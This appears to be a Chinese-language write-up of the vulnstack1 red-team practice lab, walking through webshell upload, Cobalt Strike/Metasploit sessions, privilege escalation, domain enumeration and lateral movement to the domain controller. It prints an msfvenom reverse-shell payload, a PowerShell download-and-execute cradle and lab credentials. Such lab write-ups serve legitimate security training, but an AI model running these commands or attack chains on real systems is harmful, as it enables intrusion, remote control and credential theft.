内网渗透靶场vulnstack系列:vulnstack1
一、实验环境
vulnstack1:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

实验环境:
1 | 攻击者本地:192.168.247.1 |
实验工具:AntSword、Coblat Strike、MSF、msfvenom
实验目的:在实践中学习内网渗透,主要为了练习,所以过程能学习到的地方都可以练一练。
二、实战
1、目标192.168.247.133信息收集
端口扫描,发现存在两个开放端口80 http、3306 mysql
1 | nmap -sC -sV -Pn -T5 192.168.247.133 |

访问80端口是phpinfo,并从页面获取到以下信息。并且可以从页面下方测试mysql连接来进行数据库连接测试,随便输了root/root,便连上了
1 | 服务器:Windows NT STU1 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586 |

针对网站进行探测,发现存在以下页面

访问phpadmin,用root/root登录,果然进来了,发现mysql是5.5.53,并且存在其它数据库newyxcms,猜测应该存在其它没探测到的页面,先记录下,万一用得到。


2、Getshell
首先考虑phpmyadmin漏洞利用,参考了https://www.cnblogs.com/liliyuanshangcao/p/13815242.html,尝试直接写入文件来getshell失败,没有写权限,尝试用日志记录写入shell 成功了
1 | # 开启日志记录 |
访问并用蚁剑连接

Cobalt Strike上线,设置监听

生成payload

蚁剑终端执行payload,CS成功获取shell。

3、本机信息收集并提权
1 | Systeminfo |


Administrator权限 提权到system。参考了狼组提权文章,未打MS14-058补丁KB3000061并且适用WIN7。

用CS的MS14-058提权

1 | ipconfig /all |
收集主机密码
Administrator/Hongrisec@2019

开启远程桌面
查看3389端口是否开启

添加帐号,开启远程桌面进行链接
1 | # 添加账号 |


wmic本地自动化信息收集-out.html

4、内网信息收集
域相关信息收集
查询域:net view /domain

查询域内所有主机:net view /domain:god

查询所有域成员计算机列表:net group “domain computers” /domain

查找域控 机器名:nltest /DCLIST:god

查询域内用户和管理员信息:
查询所有域用户列表:net user /domain

查看域管理员:net group “domain admins” /domain

探测内网存活主机
1 | for /L %I in (1,1,254) DO @ping -w 1 -n 192.168.247.%I | findstr "TTL=" |

或者用netbios探测

探测端口存活情况

梳理目前网络情况及攻击思路
目前内网还有两台主机,141和138,138是域控,两台主机都开了445端口,第一想到的是可能存在MS17-010漏洞直接利用,如果利用失败,可以考虑看看80和其它端口,另外还有一点就是域控可以利用前段时间新出的漏洞CVE-2020-1472。

5、横向渗透192.168.52.141
MSF反弹shell
1 | msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.247.146 LPORT=4444 -f raw > 123.php |

或者CS派生会话到MSF
1 | use multi/handler |

添加路由
1 | #查看路由信息 |

设置代理
1 | Background |

探测并尝试利用MS17-010漏洞,利用失败


发现平台里面给出了MS08-067,利用成功,getshell且权限为system


尝试将MSF会话派生到CS失败了

6、渗透域控
尝试利用MS17-010攻击域控也失败了

DC还开放了其它端口80和88,iis服务,没有可利用之处。
redis获取DC
发现提示有redis,但是我扫描都没找到这个端口开放了,后来发现服务没开,进到c:\redis\开了redis服务。redis-server.exe redis.windows.conf。

利用redis写入自启动
在CS创建监听和生成payload
1 | powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx:80/a'))" |

1 | windows 2008自启动目录:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp |
三、其它记录
YXCMS漏洞:https://blog.csdn.net/xiaoi123/article/details/82758233

http://192.168.247.133/yxcms/index.php?r=admin/index/login admin/123456
后台任意文件写入getshell

四、参考链接
ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程
ATT&cK实战系列—红队实战(一)
metasploit与Cobaltstrike互相派生shell
vulnstack1
kali meterpreter中mimikatz模块获取密码
Redis在Windows下的利用